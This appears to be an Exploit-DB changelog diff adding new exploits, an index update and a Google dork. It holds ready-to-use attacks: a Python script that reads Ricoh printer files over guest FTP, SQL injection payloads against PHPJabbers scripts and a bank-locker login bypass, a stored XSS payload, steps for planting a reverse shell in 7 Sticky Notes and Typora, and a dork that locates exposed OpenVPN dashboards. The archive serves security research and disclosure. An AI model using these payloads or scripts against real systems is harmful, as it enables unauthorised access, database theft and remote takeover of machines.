DB: 2024-01-30

10 changes to exploits/shellcodes/ghdb

Ricoh Printer - Directory and File Exposure

Blood Bank & Donor Management System using v2.2 - Stored XSS

Equipment Rental Script-1.0 - SQLi

Bank Locker Management System - SQL Injection

Fundraising Script 1.0 - SQLi

PHP Shopping Cart 4.2 - Multiple-SQLi

7 Sticky Notes v1.9 - OS Command Injection

Typora v1.7.4 - OS Command Injection

exploits/hardware/remote/51755.py

@@ -0,0 +1,52 @@
+#Exploit Title: Ricoh Printer Directory and File Exposure
+#Date: 9/15/2023
+#Exploit Author: Thomas Heverin (Heverin Hacker)
+#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
+#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
+#Version: Ricoh Printers - All Versions
+#Tested on: Windows
+#CVE: N/A
+
+#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)
+
+from ftplib import FTP
+
+def ftp_connect(ip):
+    try:
+        ftp = FTP(ip)
+        ftp.login("guest", "guest")
+        print(f"Connected to {ip} over FTP as 'guest'")
+        return ftp
+    except Exception as e:
+        print(f"Failed to connect to {ip} over FTP: {e}")
+        return None
+
+if __name__ == "__main__":
+    target_ip = input("Enter the Ricoh Printer IP address: ")
+
+    ftp_connection = ftp_connect(target_ip)
+    if ftp_connection:
+        try:
+            while True:
+                file_list = ftp_connection.nlst()
+                print("List of Ricoh printer files and directories:")
+                for index, item in enumerate(file_list, start=1):
+                    print(f"{index}. {item}")
+
+                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
+                if file_index < 0:
+                    break
+
+                if 0 <= file_index < len(file_list):
+                    selected_file = file_list[file_index]
+                    lines = []
+                    ftp_connection.retrlines("RETR " + selected_file, lines.append)
+                    print(f"Contents of '{selected_file}':")
+                    for line in lines:
+                        print(line)
+                else:
+                    print("Invalid file index.")
+        except Exception as e:
+            print(f"Failed to perform operation: {e}")
+        finally:
+            ftp_connection.quit()

exploits/php/remote/51749.TXT

@@ -0,0 +1,32 @@
+## Title: Equipment Rental Script-1.0 - SQLi
+## Author: nu11secur1ty
+## Date: 09/12/2023
+## Vendor: https://www.phpjabbers.com/
+## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The package_id parameter appears to be vulnerable to SQL injection
+attacks. The payload ' was submitted in the package_id parameter, and
+a database error message was returned. You should review the contents
+of the error message, and the application's handling of other input,
+to confirm whether a vulnerability is present. The attacker can steal
+all information from the database!
+
+[+]Payload:
+mysql
+
+Parameter: #1* ((custom) POST)
+    Type: error-based
+    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+    Payload: package_id=(-4488))) OR 1 GROUP BY
+CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
+END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING
+MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00
+
+## Reproduce:
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+home page: https://www.nu11secur1ty.com/

exploits/php/remote/51750.TXT

@@ -0,0 +1,17 @@
+# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS
+# Application: Blood Donor Management System
+# Version: v2.2
+# Bugs:  Stored XSS
+# Technology: PHP
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
+# Date: 12.09.2023
+# Author: SoSPiro
+# Tested on: Windows
+
+#POC
+========================================
+1. Login to admin account
+2. Go to /admin/update-contactinfo.php
+3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.
+4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.

exploits/php/webapps/51751.TXT

@@ -0,0 +1,29 @@
+# Exploit Title: Bank Locker Management System - SQL Injection
+# Application: Bank Locker Management System
+# Date: 12.09.2023
+# Bugs: SQL Injection
+# Exploit Author: SoSPiro
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/
+# Tested on: Windows 10 64 bit Wampserver
+
+## Description:
+This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application.
+
+## Vulnerability Details:
+- **Application Name**: Bank Locker Management System
+- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/)
+- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)
+
+## Vulnerability Description:
+The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields:
+
+Payload: admin' or '1'='1-- -
+
+An attacker can gain unauthorized access to the application with administrative privileges.
+
+## Proof of Concept (PoC):
+1. Visit the application locally at http://blms.local (assuming it's hosted on localhost).
+2. Navigate to the "banker" directory: http://blms.local/banker/
+3. In the login and password fields, input the following payload:
+4. admin' or '1'='1-- -

exploits/php/webapps/51753.TXT

@@ -0,0 +1,29 @@
+## Title: Fundraising Script-1.0 SQLi
+## Author: nu11secur1ty
+## Date: 09/13/2023
+## Vendor: https://www.phpjabbers.com/
+## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The `cid` parameter appears to be vulnerable to SQL injection attacks.
+The payload ' was submitted in the cid parameter, and a database error
+message was returned.
+The database is empty, but if it is not, this will be over for the
+money of the donors and their bank accounts!
+The attacker can steal all information from the database!
+
+[+]Payload:
+mysql
+
+Parameter: cid (GET)
+    Type: error-based
+    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
+    Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT
+(ELT(1741=1741,1))),0x7162787171),3873))
+
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+nu11secur1ty <http://nu11secur1ty.com/>

exploits/php/webapps/51754.TXT

@@ -0,0 +1,45 @@
+## Title: PHP Shopping Cart-4.2 Multiple-SQLi
+## Author: nu11secur1ty
+## Date: 09/13/2023
+## Vendor: https://www.phpjabbers.com/
+## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The `id` parameter appears to be vulnerable to SQL injection attacks.
+A single quote was submitted in the id parameter, and a database error
+message was returned. Two single quotes were then submitted and the
+error message disappeared. The attacker easily can steal all
+information from the database of this web application!
+WARNING! All of you: Be careful what you buy! This will be your responsibility!
+
+[+]Payload:
+mysql
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+    Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT
+3795=3795-- sRcp&session_id=
+
+    Type: error-based
+    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (GTID_SUBSET)
+    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
+GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT
+(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
+(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=
+
+## Reproduce:
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2
+
+## Proof and Exploit:
+https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+nu11secur1ty <http://nu11secur1ty.com/>

exploits/windows/local/51748.TXT

@@ -0,0 +1,22 @@
+# Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 12.09.2023
+# Vendor Homepage: http://www.7stickynotes.com
+# Software Link:
+http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe
+# Tested Version: 1.9 (latest)
+# Tested on: Windows 2019 Server 64bit
+
+# # #  Steps to Reproduce # # #
+
+# Open the program.
+# Click on "New Note".
+# Navigate to the "Alarms" tab.
+# Click on either of the two buttons.
+# From the "For" field, select "1" and "seconds" (to obtain the shell
+within 1 second).
+# From the "Action" dropdown, select "command".
+# In the activated box, enter the reverse shell command and click the "Set"
+button to set the alarm.
+# Finally, click on the checkmark to save the alarm.
+# Reverse shell obtained!

exploits/windows/local/51752.TXT

@@ -0,0 +1,18 @@
+# Exploit Title: Typora v1.7.4 - OS Command Injection
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 13.09.2023
+# Vendor Homepage: http://www.typora.io
+# Software Link: https://download.typora.io/windows/typora-setup-ia32.exe
+# Tested Version: v1.7.4 (latest)
+# Tested on: Windows 2019 Server 64bit
+
+# # #  Steps to Reproduce # # #
+
+# Open the application
+# Click on Preferences from the File menu
+# Select PDF from the Export tab
+# Check the “run command” at the bottom right and enter your reverse shell
+command into the opened box
+# Close the page and go back to the File menu
+# Then select PDF from the Export tab and click Save
+# Reverse shell is ready!

files_exploits.csv

@@ -3860,6 +3860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18291,exploits/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,remote,hardware,,2011-12-30,2011-12-30,0,OSVDB-78282;CVE-2011-5053,,reaver-1.1.tar.gz,,,
 34802,exploits/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",remote,hardware,,2010-10-04,2014-09-28,1,,,,,,https://www.securityfocus.com/bid/43685/info
 51642,exploits/hardware/remote/51642.py,"ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)",2023-08-04,"Riyan Firmansyah of Seclab",remote,hardware,,2023-08-04,2023-08-04,0,,,,,,
+51755,exploits/hardware/remote/51755.py,"Ricoh Printer - Directory and File Exposure",2024-01-29,"Thomas Heverin",remote,hardware,,2024-01-29,2024-01-29,0,,,,,,
 9858,exploits/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",remote,hardware,8022,2009-10-07,2016-10-29,1,CVE-2009-3710;OSVDB-58858,,,,,
 8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",remote,hardware,,2009-03-22,,1,OSVDB-56342;OSVDB-56341;OSVDB-56340;OSVDB-56339,,2009-Louhi_CMC-brute_090323.zip,,,http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
 24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,,
@@ -12887,6 +12888,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39514,exploits/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,remote,php,80,2016-03-01,2016-03-01,1,CVE-2016-2555,"Metasploit Framework (MSF)",,,http://www.exploit-db.comATutor-2.2.1.tar.gz,
 47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,,2019-08-13,2019-08-13,0,,Malware,,,,
 47215,exploits/php/remote/47215.rb,"Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)",2019-08-08,"Ege Balci",remote,php,80,2019-08-08,2019-08-08,0,,"Metasploit Framework (MSF)",,,,
+51750,exploits/php/remote/51750.TXT,"Blood Bank & Donor Management System using v2.2 - Stored XSS",2024-01-29,SoSPiro,remote,php,,2024-01-29,2024-01-29,0,,,,,,
 47699,exploits/php/remote/47699.rb,"Bludit - Directory Traversal Image File Upload (Metasploit)",2019-11-20,Metasploit,remote,php,,2019-11-20,2019-11-20,1,CVE-2019-16113,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/bludit_upload_images_exec.rb
 45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,,2018-11-06,2018-11-06,1,CVE-2018-9206,"Metasploit Framework (MSF)",,,http://www.exploit-db.comjQuery-File-Upload-9.22.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a32d8083f023c1445f411b74b8f85de5754cd3a0/modules/exploits/unix/webapp/jquery_file_upload.rb
 45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,,2018-11-06,2018-11-06,1,CVE-2018-9206,Remote,,,http://www.exploit-db.comjQuery-File-Upload-9.22.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a32d8083f023c1445f411b74b8f85de5754cd3a0/modules/exploits/unix/webapp/jquery_file_upload.rb
@@ -12908,6 +12910,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,,2018-08-20,2018-08-21,1,CVE-2018-15576,Remote,,,,https://srcincite.io/pocs/cve-2018-15576.php.txt
 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Metasploit Framework (MSF)",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb
 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb
+51749,exploits/php/remote/51749.TXT,"Equipment Rental Script-1.0 - SQLi",2024-01-29,nu11secur1ty,remote,php,,2024-01-29,2024-01-29,0,,,,,,
 24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,remote,php,,2013-01-10,2013-01-10,1,OSVDB-88751,"Metasploit Framework (MSF)",,,,
 40434,exploits/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,remote,php,,2016-09-27,2016-09-27,0,,"Metasploit Framework (MSF)",,,,
 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,,2019-05-20,2019-05-20,1,CVE-2019-11231,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
@@ -14528,6 +14531,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51378,exploits/php/webapps/51378.txt,"Bang Resto v1.0 - 'Multiple' SQL Injection",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-28,1,CVE-2023-29849,,,,,
 51377,exploits/php/webapps/51377.txt,"Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-28,1,CVE-2023-29848,,,,,
 51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
+51751,exploits/php/webapps/51751.TXT,"Bank Locker Management System - SQL Injection",2024-01-29,SoSPiro,webapps,php,,2024-01-29,2024-01-29,0,,,,,,
 41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip,
 17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,,
 9387,exploits/php/webapps/9387.txt,"Banner Exchange Script 1.0 - 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",webapps,php,,2009-08-06,,1,CVE-2009-5003;OSVDB-68191,,,,,
@@ -18873,6 +18877,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2621,exploits/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusions",2006-10-23,020,webapps,php,,2006-10-22,2016-09-14,1,OSVDB-30035;CVE-2006-5526,,,,http://www.exploit-db.comFM2021-4-40.tar.gz,
 29869,exploits/php/webapps/29869.php,"Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion",2007-04-19,"HACKERS PAL",webapps,php,,2007-04-19,2013-11-28,1,CVE-2007-2257;OSVDB-35419,,,,,https://www.securityfocus.com/bid/23565/info
 3998,exploits/php/webapps/3998.php,"Fundanemt 2.2.0 - 'spellcheck.php' Remote Code Execution",2007-05-27,Kacper,webapps,php,,2007-05-26,,1,OSVDB-36657;CVE-2007-2935,,,,,
+51753,exploits/php/webapps/51753.TXT,"Fundraising Script 1.0 - SQLi",2024-01-29,nu11secur1ty,webapps,php,,2024-01-29,2024-01-29,0,,,,,,
 37500,exploits/php/webapps/37500.txt,"Funeral Script PHP - Cross-Site Scripting / SQL Injection",2012-06-17,snup,webapps,php,,2012-06-17,2015-07-06,1,,,,,,https://www.securityfocus.com/bid/54402/info
 27275,exploits/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,webapps,php,,2013-08-02,2013-08-02,0,OSVDB-95946,,,,http://www.exploit-db.comfg_download.zip,
 8493,exploits/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,webapps,php,,2009-04-19,,1,OSVDB-54165;CVE-2009-1489;OSVDB-54164;CVE-2009-1488;OSVDB-54163;CVE-2009-1487,,,,,
@@ -26175,6 +26180,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38572,exploits/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,webapps,php,,2015-10-30,2015-10-30,0,,,,,http://www.exploit-db.comphpservermon-3.1.1.zip,http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt
 45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80,2018-12-03,2018-12-03,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comphpservermon-3.3.1.tar.gz,
 12861,exploits/php/webapps/12861.txt,"PHP SETI@home Web monitor - 'PHPsetimon' Local/Remote File Inclusion",2010-06-03,eidelweiss,webapps,php,,2010-06-02,,0,,,,,,
+51754,exploits/php/webapps/51754.TXT,"PHP Shopping Cart 4.2 - Multiple-SQLi",2024-01-29,nu11secur1ty,webapps,php,,2024-01-29,2024-01-29,0,,,,,,
 2119,exploits/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,webapps,php,,2006-08-06,,1,OSVDB-27805;CVE-2006-4052;OSVDB-27804;OSVDB-27803;OSVDB-27802;OSVDB-27801;OSVDB-27800,,,,,http://advisories.echo.or.id/adv/adv44-matdhule-2006.txt
 5842,exploits/php/webapps/5842.txt,"PHP Site Lock 2.0 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,webapps,php,,2008-06-16,,1,OSVDB-46792;CVE-2008-2865,,,,,
 8604,exploits/php/webapps/8604.txt,"PHP Site Lock 2.0 - Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",webapps,php,,2009-05-03,,1,OSVDB-54203;CVE-2009-1587,,,,,
@@ -39256,6 +39262,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",2021-11-05,"Brian Rodriguez",local,windows,,2021-11-05,2021-11-05,0,,,,,,
 50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",2021-11-02,ro0k,local,windows,,2021-11-02,2021-11-02,0,,,,,,
 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,,2020-04-01,2020-04-01,0,,,,,,
+51748,exploits/windows/local/51748.TXT,"7 Sticky Notes v1.9 - OS Command Injection",2024-01-29,"Ahmet Ümit BAYRAM",local,windows,,2024-01-29,2024-01-29,0,,,,,,
 17647,exploits/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",local,windows,,2011-08-10,2012-11-15,1,,,,http://www.exploit-db.com/screenshots/idlt18000/screen-shot-2012-11-15-at-74224-am.png,http://www.exploit-db.coma-pdf-atmc.exe,
 15033,exploits/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,local,windows,,2010-09-17,2010-09-17,1,OSVDB-68132,,,http://www.exploit-db.com/screenshots/idlt15500/15033.png,http://www.exploit-db.coma-pdf-atmc.exe,
 16009,exploits/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Local Buffer Overflow",2011-01-18,h1ch4m,local,windows,,2011-01-18,2011-01-18,1,,,,http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-01-18-at-82452-am.png,http://www.exploit-db.coma-pdf-atmc.exe,
@@ -41613,6 +41620,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17967,exploits/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,local,windows,,2011-10-11,2016-10-27,1,CVE-2008-4779;OSVDB-49371,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt18000/17967.png,,
 47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,,2019-06-20,2019-06-20,0,,,,,http://www.exploit-db.comtuneclone_setup.exe,
 12293,exploits/windows/local/12293.py,"TweakFS 1.0 FSX Edition - Stack Buffer Overflow",2010-04-19,corelanc0d3r,local,windows,,2010-04-18,2011-01-03,1,OSVDB-63899;CVE-2010-1458,,,http://www.exploit-db.com/screenshots/idlt12500/screen-shot-2011-01-03-at-84220-pm.png,http://www.exploit-db.comtweakfs_zip_fsx.zip,http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026
+51752,exploits/windows/local/51752.TXT,"Typora v1.7.4 - OS Command Injection",2024-01-29,"Ahmet Ümit BAYRAM",local,windows,,2024-01-29,2024-01-29,0,,,,,,
 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,,2017-12-26,2017-12-26,0,CVE-2016-6914,,,,,
 33961,exploits/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Privilege Escalation",2014-07-03,LiquidWorm,local,windows,,2014-07-04,2014-07-09,1,OSVDB-108726;CVE-2014-5453,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-09-at-91305-am.png,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5191.php
 36189,exploits/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Privilege Escalation",2015-02-26,LiquidWorm,local,windows,,2015-02-27,2015-02-27,0,OSVDB-118804,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5230.php

ghdb.xml

@@ -116843,6 +116843,24 @@ Linkedin: https://www.linkedin.com/in/hemantsolo/
   <date>2006-04-25</date>
   <author>anonymous</author>
  </entry>
+ <entry>
+  <id>8399</id>
+  <link>https://www.exploit-db.com/ghdb/8399</link>
+  <category>Vulnerable Servers</category>
+  <shortDescription>intitle:&quot;OpenVpn Status Monitor&quot;</shortDescription>
+  <textualDescription># Exploit Title: Anonymous Access to OpenVpn Monitoring Dashbaord
+# Google Dork: intitle:&quot;OpenVpn Status Monitor&quot;
+# Date: 27 Jan 2024
+# Exploit Author: Sabean Technology
+# Vendor Homepage: https://github.com/furlongm/openvpn-monitor
+
+Demewoz Agegnehu | Sabean Technology | https://sabtechx.com</textualDescription>
+  <query>intitle:&quot;OpenVpn Status Monitor&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;OpenVpn Status Monitor&quot;</querystring>
+  <edb></edb>
+  <date>2024-01-29</date>
+  <author>Sabean Technology</author>
+ </entry>
  <entry>
   <id>118</id>
   <link>https://www.exploit-db.com/ghdb/118</link>